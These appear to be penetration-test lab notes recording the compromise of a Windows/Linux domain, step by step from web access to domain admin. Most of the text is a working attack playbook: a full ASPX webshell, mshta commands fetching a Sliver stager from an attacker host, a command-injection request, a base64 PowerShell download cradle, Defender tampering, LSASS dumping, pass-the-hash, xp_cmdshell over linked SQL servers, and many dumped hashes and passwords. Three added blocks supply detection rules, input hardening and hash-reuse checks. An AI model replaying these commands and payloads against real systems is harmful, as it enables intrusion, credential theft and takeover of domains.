Detailed Findings and Recommendations
The scope of this penetration test is to identify, exploit and report the results of the penetration test performed on the following set of IP addresses.
| IPs | Machine name | Status | Domain |
|---|---|---|---|
| 172.16.225.180 | Dc01 | compromised | final.com |
| 192.168.225.181 | web05 | compromised | final.com |
| 172.16.225.183 | Jump03 | compromised | final.com |
| 172.16.225.184 | Ansible06 | compromised | final.com |
| 172.16.225.197 | Appserver05 | compromised | dev.final.com |
| 172.16.225.194 | WEB06 | compromised | dev.final.com |
| 172.16.225.192 | DC02 | compromised | dev.final.com |
| 172.16.225.188 | SQL11 | compromised | final.com |
| 172.16.225.187 | SQL03 | compromised | final.com |
192.168.225.189 (FIREWALL02)
Recon
Nmap scan
sudo nmap -sC -sV -oA firewall02 -vv 192.168.225.189 -Pn
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
445/tcp open microsoft-ds? syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: FIREWALL02
| NetBIOS_Domain_Name: FIREWALL02
| NetBIOS_Computer_Name: FIREWALL02
| DNS_Domain_Name: firewall02
| DNS_Computer_Name: firewall02
| Product_Version: 10.0.17763
|_ System_Time: 2024-04-25T21:16:25+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
feroxbuster
feroxbuster -k -u http://192.168.225.189 --force-recursion -C 404,405 -m GET,POST -e -x html,js,php
192.168.225.181 (WEB05)
Recon
Payload Development
Aspx shell
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string test(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(test(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
Initial access
C:\Windows\System32\mshta.exe http://192.168.45.248/sliver64.hta

Privilege Escalation
- Use the sph.exe file generated from sliverphollow above
- copy '/opt/Tools/privesc-windows/PrintSpoofer64.exe'
cp /opt/Tools/privesc-windows/PrintSpoofer64.exe .
upload sph.exe
./donut -i /home/jay/osep/challenge6/resources_development/PrintSpoofer64.exe -a 2 -b 2 -o /tmp/payload.bin -p '-c c:\windows\temp\sph.exe'
execute notepad.exe
ps -e notepad
execute-shellcode -p 3604 /tmp/payload.bin

Post Exploitation
Disabling AV
execute -o cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
sliver (CALM_CULVERT) > hashdump
[*] Successfully executed hashdump
[*] Got output:
Administrator:500:Administrator:500:aad3b435b51404eeaad3b435b51404ee:9689cee5c72d2ef437de593af89bb4ff:::::
Guest:501:Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
DefaultAccount:503:DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
WDAGUtilityAccount:504:WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:0830e44897e2d5a6e779aba9dc2b6c56:::::
Nanodump
nanodump 572 test 1 PMDM
download test
python3 -m pypykatz lsa minidump test

adminWebSvc
b0df1cb0819ca0b7d476d4c868175b94
- ligolo setup
evilwinrm
evil-winrm -i 172.16.225.181 -u adminWebSvc -H b0df1cb0819ca0b7d476d4c868175b94
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
execute -o cmd /c "reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f"
xfreerdp /u:adminWebSvc /pth:b0df1cb0819ca0b7d476d4c868175b94 /v:192.168.225.181
ForceChangePassword
pth-net rpc password "Nina" "newP@ssword2022" -U final.com/adminwebsvc%b0df1cb0819ca0b7d476d4c868175b94:b0df1cb0819ca0b7d476d4c868175b94 -S 172.16.225.181
172.16.225.183 (Jump03)
xfreerdp /u:nina /p:newP@ssword2022 /v:172.16.225.183

sharpup audit
sc.exe config snmptrap start= auto
sc config "SNMPTRAP" obj= "NT AUTHORITY\SYSTEM" password= ""
sc config "SNMPTRAP" binPath= "net localgroup Administrators final\nina /add"
sc stop "SNMPTRAP"
net localgroup Administrators
sc start "SNMPTRAP"
net localgroup Administrators
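Every command used so far to get to SYSTEM and to blunt Defender (the MpCmdRun definition wipe on WEB05, the DisableRestrictedAdmin registry change, the mshta stager and the SNMPTRAP binPath trick on Jump03) leaves a process-creation record. The block below is an added example, not part of these notes or of any tool mentioned in them: detection rules for those four command lines, run over constructed sample telemetry in an assumed `user|image|command_line` layout. The rule names, the log format and the sample lines are my own assumptions.

```python
"""Detection logic for the command lines recorded in these notes (added example)."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern


# One rule per technique seen in the notes. Names are assumptions; patterns are
# deliberately narrow so they can be tuned against real telemetry.
RULES = [
    # Restricted Admin mode switched on (DisableRestrictedAdmin = 0), which
    # permits pass-the-hash logons over RDP.
    Rule("restricted_admin_enabled",
         re.compile(r"reg(\.exe)?\s+add\s+.*\\Lsa\b.*DisableRestrictedAdmin.*\s/d\s+0x?0\b", re.I)),
    # Defender signature database wiped with MpCmdRun.
    Rule("defender_definitions_removed",
         re.compile(r"MpCmdRun(\.exe)?.*-RemoveDefinitions", re.I)),
    # Service binary path pointed at a command (net/cmd/powershell) rather than
    # a service executable: the local-group-add trick used on Jump03.
    Rule("service_binpath_to_command",
         re.compile(r"\bsc(\.exe)?\s+config\s+.*binPath=\s*\"?(net\s|cmd|powershell)", re.I)),
    # mshta pulling an HTA over HTTP(S).
    Rule("mshta_remote_hta",
         re.compile(r"mshta(\.exe)?\s+https?://", re.I)),
]

# Constructed sample telemetry (assumed "user|image|command_line" layout); the
# command lines themselves mirror the ones in the notes, the rest is made up.
SAMPLE_LOG = "\n".join([
    r"WEB05\adminWebSvc|C:\Windows\System32\reg.exe|reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f",
    r'WEB05\SYSTEM|C:\Program Files\Windows Defender\MpCmdRun.exe|"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All',
    r'JUMP03\nina|C:\Windows\System32\sc.exe|sc config "SNMPTRAP" binPath= "net localgroup Administrators final\nina /add"',
    r'JUMP03\nina|C:\Windows\System32\sc.exe|sc config "SNMPTRAP" start= auto',
    r"WEB05\user|C:\Windows\System32\mshta.exe|C:\Windows\System32\mshta.exe http://192.168.45.248/sliver64.hta",
    r"WEB05\user|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\user\notes.txt",
])


def parse_line(line: str) -> dict:
    """Split one telemetry line into its three fields."""
    user, image, command_line = line.split("|", 2)
    return {"user": user, "image": image, "command_line": command_line}


def match_rules(event: dict) -> list[str]:
    """Names of every rule whose pattern matches the event's command line."""
    return [r.name for r in RULES if r.pattern.search(event["command_line"])]


def scan(log_text: str) -> list[tuple[str, str]]:
    """(rule_name, user) for each line that triggers at least one rule."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_line(line)
        for name in match_rules(event):
            hits.append((name, event["user"]))
    return hits


if __name__ == "__main__":
    for name, user in scan(SAMPLE_LOG):
        print(f"{name:32} {user}")
```

The `start= auto` line and the local notepad line are left in the sample on purpose: a `sc config` or `mshta` invocation on its own is routine, and it is the binPath content and the remote URL that carry the signal.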

- Start powershell as admin user
- execute the payload sph.exe
nanodump 580 test1 1 PMDM
download test1
python3 -m pypykatz lsa minidump test1
Username: Administrator
Domain: JUMP03
LM: NA
NT: 935a2a886200d2bf5040b1344b2d33d7
SHA1: 6a1c961b199adf48ce253a680c3f59c69ab58542
Username: tommy
Domain: FINAL
LM: NA
NT: 5ad27ee8000951e0669fab25f73f9d8a
SHA1: 83f547f292288b86f9d17d27097f6c30257a8493
DPAPI: f08238f6307b02108f31c3bca65bc27a
== Kerberos ==
Username: tommy
Domain: FINAL.COM
Password: 89dsfsji43A
Password (hex): 3800390064007300660073006a0069003400330041000000
cme rdp ips.txt -u tommy -H 5ad27ee8000951e0669fab25f73f9d8a -d final.com 2>/dev/null
172.16.225.184 Ansible06
ssh final.com\\tommy@172.16.225.184

sudo -l
sudo lua -e 'os.execute("/bin/bash")'
In ansiblesvc
cat y.pub > .ssh/authorized_keys
chmod 600 ansible
ssh -i ansible ansiblesvc@172.16.225.184
/etc/ansible$ cat hosts
172.16.225.197 (Appserver05) from ansible06
ssh appserver05.dev.final.com
sudo su
root@appserver05:~# cat proof.txt
c8a5fbdf5ccaedb65a6f325562389611
172.16.225.194 (WEB06)
pivot from appserver05
- command injection on port 8081
GET /?ipaddr=17.0.0.1|powershell+mshta.exe+http://192.168.45.248/sliver64.hta HTTP/1.1
Host: 172.16.225.194:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://172.16.225.194:8081/?ipaddr=127.0.0.1
Connection: close
Upgrade-Insecure-Requests: 1
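The request above works because the `ipaddr` value on port 8081 is handed to a shell unvalidated, so `|` ends the intended command and starts another. As an added example (not code from WEB06 or from these notes; the service's real implementation is unknown and the handler below is a hypothetical stand-in), this is how that parameter should be handled: accept only an IP literal and never let a shell parse the argument.

```python
"""Hardened handling of the ipaddr parameter (added example, hypothetical handler)."""
import ipaddress
import os
import subprocess
from urllib.parse import parse_qs, urlsplit


class InvalidTarget(ValueError):
    """Raised when the supplied ipaddr is not a literal IP address."""


def validate_ipaddr(raw: str) -> str:
    """Return the normalised IP literal or raise InvalidTarget.

    ipaddress.ip_address() only accepts a well-formed IPv4/IPv6 literal, so
    hostnames, extra tokens and shell metacharacters such as '|', ';' or '&'
    are all rejected before any process is started.
    """
    try:
        return str(ipaddress.ip_address(raw.strip()))
    except ValueError as exc:
        raise InvalidTarget(f"not an IP address: {raw!r}") from exc


def build_ping_argv(target: str, count: int = 1) -> list[str]:
    """Argument vector for ping, built as a list so no shell ever parses it.

    The unsafe pattern this replaces is string concatenation into a shell
    (os.system("ping " + target) or shell=True), which is exactly what lets
    a '|' in the query string reach cmd.exe.
    """
    ip = validate_ipaddr(target)
    count_flag = "-n" if os.name == "nt" else "-c"
    return ["ping", count_flag, str(count), ip]


def ping(target: str) -> str:
    """Run ping against a validated address without shell=True."""
    result = subprocess.run(build_ping_argv(target), capture_output=True,
                            text=True, timeout=15)
    return result.stdout


def handle_request_target(request_target: str) -> list[str]:
    """Extract ipaddr from a request-target such as '/?ipaddr=127.0.0.1'.

    Exactly one ipaddr value is required. parse_qs also turns '+' into a
    space, so 'ipaddr=1.2.3.4|powershell+...' reaches validate_ipaddr as one
    string and is rejected there.
    """
    values = parse_qs(urlsplit(request_target).query).get("ipaddr", [])
    if len(values) != 1:
        raise InvalidTarget("exactly one ipaddr parameter is required")
    return build_ping_argv(values[0])


def is_accepted(request_target: str) -> bool:
    """True when the request-target would be allowed to reach ping."""
    try:
        handle_request_target(request_target)
        return True
    except InvalidTarget:
        return False


if __name__ == "__main__":
    for rt in ("/?ipaddr=127.0.0.1", "/?ipaddr=17.0.0.1|powershell+whoami"):
        print(f"{rt:45} accepted={is_accepted(rt)}")
```

Validation on the parameter is the first line; the argv list is the second. Either alone is an improvement, but only the combination removes the shell from the path entirely, which is what makes the 8081 finding go away rather than just get harder.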
Privilege escalations as above
- check web05
KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIANAA4ADoAOAAwAC8AYQBtAHMAaQA2ADQALgB0AHgAdAAnACkAIAB8ACAASQBFAFgA
Username: apacheSvc
Domain: DEV
LM: NA
NT: a6a5f008019060ab8079feca697f9f73
SHA1: e957ac189a18afeaa3719d633bb817c14d132336
DPAPI: 9ac5d1d435e5c7fd520505b52faa487b
== MSV ==
Username: sqlsvc01
Domain: DEV
LM: NA
NT: 077a55c458dc4002dfdc5321a7659526
SHA1: 8094dd9dcd751be1081dded062d5e0153daf8836
DPAPI: b713b3e0fc6eb8e37cadd2d5eda8daea
Username: setup
Domain: WEB06
LM: NA
NT: 42efdb0f0c884f32d51c2d785ea2d174
SHA1: f76679836170e221fe696e1deec2b5aa83e18d38
DPAPI: NA
xfreerdp /u:Administrator /pth:f99529e42ee77dc4704c568ba9320a34 /v:172.16.225.194
socks5 start
172.16.225.187
proxychains mssqlclient.py Administrator@172.16.225.194 -hashes f99529e42ee77dc4704c568ba9320a34:f99529e42ee77dc4704c568ba9320a34 -windows-auth
exec_as_login sa
select * from openquery("SQL03", 'SELECT is_srvrolemember(''sysadmin'')')
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell';
EXEC master.dbo.sp_serveroption @server = N'SQL03', @optname = N'rpc out', @optvalue = N'true';
EXEC('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [SQL03];
EXEC('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [SQL03];
EXEC('EXEC xp_cmdshell ''whoami'';') AT [SQL03];
EXEC('EXEC xp_cmdshell ''C:\Windows\System32\mshta.exe http://192.168.45.248/sliver64.hta'';') AT [SQL03];
- Revert the setting afterwards (cleanup)
EXEC('EXEC sp_configure ''show advanced options'', 0; RECONFIGURE;') AT [SQL03];
Privilege Escalation
upload sph.exe
execute notepad.exe
ps -e notepad.exe
execute-shellcode -p 1364 /tmp/payload.bin
Post Exploitation
sqlrecon -- /enum:sqlspns
- identify lsass.exe
ps
nanodump 576 test4 1 PMDM
download test4
python3 -m pypykatz lsa minidump test4
Username: sqlsvc03
Domain: FINAL
LM: NA
NT: 77f944ff6e0c0ed0c83dcef57bdf9298
SHA1: 747df671015d1ec1c50ffc38f4ecc97b7ead8c32
DPAPI: 17aa3dc68e3e67783ace602437ee352c
mssqlclient.py sqlsvc03@172.16.225.187 -hashes 77f944ff6e0c0ed0c83dcef57bdf9298:77f944ff6e0c0ed0c83dcef57bdf9298 -windows-auth
hashdump
172.16.225.188
mssqlclient.py sqlsvc03@172.16.225.188 -hashes 77f944ff6e0c0ed0c83dcef57bdf9298:77f944ff6e0c0ed0c83dcef57bdf9298 -windows-auth

password reuse from the SQL03 admin account
cme smb 172.16.225.188 -u 'Administrator' -H 8388d07604009d14cbb78f7d37b9e887 --local-auth
cme smb 172.16.225.188 -u 'Administrator' -H 8388d07604009d14cbb78f7d37b9e887 --local-auth -x "C:\Windows\System32\mshta.exe http://192.168.45.248/sliver64.hta" --exec-method smbexec

execute notepad.exe
ps -e notepad.exe
nanodump 580 test5 1 PMDM
download test5
python3 -m pypykatz lsa minidump test5
Username: tina
Domain: FINAL
LM: NA
NT: 1d4c153225b424290188504b9e0541eb
SHA1: 6ea7a37a1b5b943266cde1176d497e0044d69512
DPAPI: ea0e1bc1ff1c38a63033aa9e134b4fe4
Username: tina
Domain: FINAL.COM
Password: df54ikosdfGFkoal
172.16.225.180
cme smb 172.16.225.180 -u 'tina' -H 1d4c153225b424290188504b9e0541eb -x "C:\Windows\System32\mshta.exe http://192.168.45.248/sliver64.hta" --exec-method smbexec
cme smb 172.16.225.180 -u 'tina' -H 1d4c153225b424290188504b9e0541eb -M ntdsutil

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0474d3f0a74d30f13f1fec243e8ac3cb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:c0fc44703804b02590fe92237adca0de:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:405854caaf49b41e0e585369a001f114:::
DEV$:1103:aad3b435b51404eeaad3b435b51404ee:3539d6b0f82488e8088702b6c569f4e8:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
FINAL$:1103:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
final.com\tina:1109:aad3b435b51404eeaad3b435b51404ee:1d4c153225b424290188504b9e0541eb:::
final.com\nina:1110:aad3b435b51404eeaad3b435b51404ee:25af00893895d3d871e625c5d4261539:::
final.com\tommy:1112:aad3b435b51404eeaad3b435b51404ee:5ad27ee8000951e0669fab25f73f9d8a:::
final.com\sqlsvc03:1113:aad3b435b51404eeaad3b435b51404ee:77f944ff6e0c0ed0c83dcef57bdf9298:::
final.com\sqlsvc11:1114:aad3b435b51404eeaad3b435b51404ee:c0f6442ea39956aebf28219639ba9953:::
final.com\adminWebSvc:1115:aad3b435b51404eeaad3b435b51404ee:b0df1cb0819ca0b7d476d4c868175b94:::
dev.final.com\diana:1107:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
dev.final.com\sqlsvc01:1108:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
dev.final.com\apacheSvc:1109:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SQL03$:1116:aad3b435b51404eeaad3b435b51404ee:f4d6ce33fa1e2fcd01e0545a9ae47fee:::
SQL11$:1117:aad3b435b51404eeaad3b435b51404ee:7092f556ae1a347ae0ed38ffd25997d6:::
WEB06$:1110:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WEB05$:1118:aad3b435b51404eeaad3b435b51404ee:243e259c4f96e630b80551697fef50f8:::
JUMP03$:1119:aad3b435b51404eeaad3b435b51404ee:3478cc08e4780d8f65dbf210fa5f78af:::
ANSIBLE06$:1120:aad3b435b51404eeaad3b435b51404ee:125b6af695a522e547859b474a2ebecd:::
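Two of the findings in these notes are visible directly in the dumped hashes: the local Administrator hash from SQL03 being reused on SQL11, and several accounts carrying the NT hash of the empty password (on a cross-domain NTDS dump that can also mean a secret that was simply not extracted, so it is a prompt to check, not a verdict). The block below is an added example, not part of the notes: a parser for both dump layouts that appear on this page (secretsdump/ntdsutil style and sliver hashdump style) plus the reuse and empty-password checks, run over a sample built from lines on this page. The SQL03/SQL11 Administrator lines are reconstructed from the hash reused in the cme commands; the host labels are my own.

```python
"""Credential-hygiene checks over dumped hashes (added example)."""
import re
from collections import defaultdict

HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored


def parse_dump(text: str) -> list[tuple[str, str, str]]:
    """Return (account, lm, nt) per record line.

    Handles both layouts seen in the notes: 'user:rid:lm:nt:::' and the
    sliver hashdump form 'user:rid:user:rid:lm:nt:::::'. The first two
    32-hex-character fields are taken as LM and NT.
    """
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        hashes = [p.lower() for p in parts if HEX32.match(p)]
        if len(hashes) < 2:
            continue  # blank line or not a hash record
        entries.append((parts[0], hashes[0], hashes[1]))
    return entries


def analyse(dumps: dict[str, str]) -> dict:
    """Flag empty-password accounts, NT hashes shared across accounts or
    hosts, and accounts that still store an LM hash."""
    owners_by_nt = defaultdict(set)
    empty, lm_stored = [], []
    for host, text in dumps.items():
        for account, lm, nt in parse_dump(text):
            owner = f"{host}\\{account}"
            owners_by_nt[nt].add(owner)
            if nt == EMPTY_NT:
                # Blank password, or (cross-domain NTDS dump) a secret that
                # was not actually extracted; either way worth verifying.
                empty.append(owner)
            if lm != EMPTY_LM:
                lm_stored.append(owner)
    # The same domain account seen in two DC dumps would also land here; the
    # reader de-duplicates those by principal rather than by host.
    reused = {nt: sorted(o) for nt, o in owners_by_nt.items()
              if nt != EMPTY_NT and len(o) > 1}
    return {"empty_password": sorted(empty),
            "reused_hash": reused,
            "lm_stored": sorted(lm_stored)}


# Sample built from lines on this page; SQL03/SQL11 Administrator records are
# reconstructed from the reused hash, the host keys are assumptions.
SAMPLE_DUMPS = {
    "DC01": """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0474d3f0a74d30f13f1fec243e8ac3cb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:405854caaf49b41e0e585369a001f114:::
final.com\\tina:1109:aad3b435b51404eeaad3b435b51404ee:1d4c153225b424290188504b9e0541eb:::
final.com\\adminWebSvc:1115:aad3b435b51404eeaad3b435b51404ee:b0df1cb0819ca0b7d476d4c868175b94:::
""",
    "SQL03": "Administrator:500:aad3b435b51404eeaad3b435b51404ee:8388d07604009d14cbb78f7d37b9e887:::\n",
    "SQL11": "Administrator:500:aad3b435b51404eeaad3b435b51404ee:8388d07604009d14cbb78f7d37b9e887:::\n",
    "WEB05": """\
Administrator:500:Administrator:500:aad3b435b51404eeaad3b435b51404ee:9689cee5c72d2ef437de593af89bb4ff:::::
Guest:501:Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
DefaultAccount:503:DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
""",
}


if __name__ == "__main__":
    for finding, detail in analyse(SAMPLE_DUMPS).items():
        print(f"{finding}: {detail}")
```

The reuse check is what turns "password reuse from the SQL03 admin account" into a recommendation that can be verified after remediation: once local Administrator passwords are unique per host (LAPS or equivalent), `reused_hash` comes back empty on a fresh dump.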
Domain Admins Owns Enterprise Admins
sharpview Add-DomainObjectAcl -TargetIdentity \"Enterprise Admins\" -Rights WriteMembers -PrincipalIdentity tina
sharpview Add-DomainGroupMember -Identity \"Enterprise Admins\" -Members tina
sharpview Get-DomainGroupMember -Identity \"Enterprise Admins\"
172.16.225.192
cme smb 172.16.225.192 -u 'tina' -H 1d4c153225b424290188504b9e0541eb -d final.com -x "C:\Windows\System32\mshta.exe http://192.168.45.248/sliver64.hta"
Additional Items
Appendix - AMSI Bypass code
Appendix - Powershell Shellcoderunner
Appendix - ANOTHER_SHELLCODE_USED Shellcoderunner Code
Appendix - Risk Assessment Matrix
Appendix - Proof and Local Contents
| Hostname | local.txt Contents | proof.txt Contents |
|---|---|---|
| HOSTNAME | foo | bar |
| HOSTNAME | foo | bar |
Appendix - Credentials obtained
NTLM Hashes
| Username | NTLM Hash | Found in |
|---|---|---|
| Administrator | HASH | HOSTNAME |
Passwords
| Found in | Corresponds to | Password |
|---|---|---|
| HOSTNAME | USER BELONGS | Password123* |
Credential files
| Found in | File | Type |
|---|---|---|
| HOSTNAME | FILE FROM WHERE IS IT | Example: SSH Priv. Key |